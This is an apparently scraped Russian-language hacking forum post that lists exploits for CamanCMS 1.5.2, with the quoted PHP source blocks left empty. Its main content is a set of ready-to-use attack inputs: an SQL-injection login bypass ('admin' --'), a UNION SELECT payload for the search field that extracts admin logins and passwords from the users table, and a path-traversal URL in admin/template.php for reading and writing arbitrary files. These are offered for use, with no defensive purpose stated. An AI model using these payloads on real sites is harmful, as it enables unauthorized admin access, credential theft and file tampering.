![]() |
CamanCMS
CamanCMS
sql-inj (Заходим под админом) login.php PHP код:
Код:
Login: admin' -- sql-inj search.php PHP код:
Код:
В поле поиска вводим: ' union select 1,2,concat_ws(0x3b,login,password),4,5,6,7,8 from users where admin=1-- Из-за htmlspecialchars в search.php (код выше) Код:
http://localhost/search/ Код:
И в login.php |
Произвольное чтение файлов и запись информации в файлы
version: CamanCMS 1.5.2 Need: admin account admin/template.php PHP код:
PHP код:
Код:
http://localhost/caman/admin/template.php?shab=../.htaccess |
Часовой пояс GMT +3, время: 13:09. |
Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot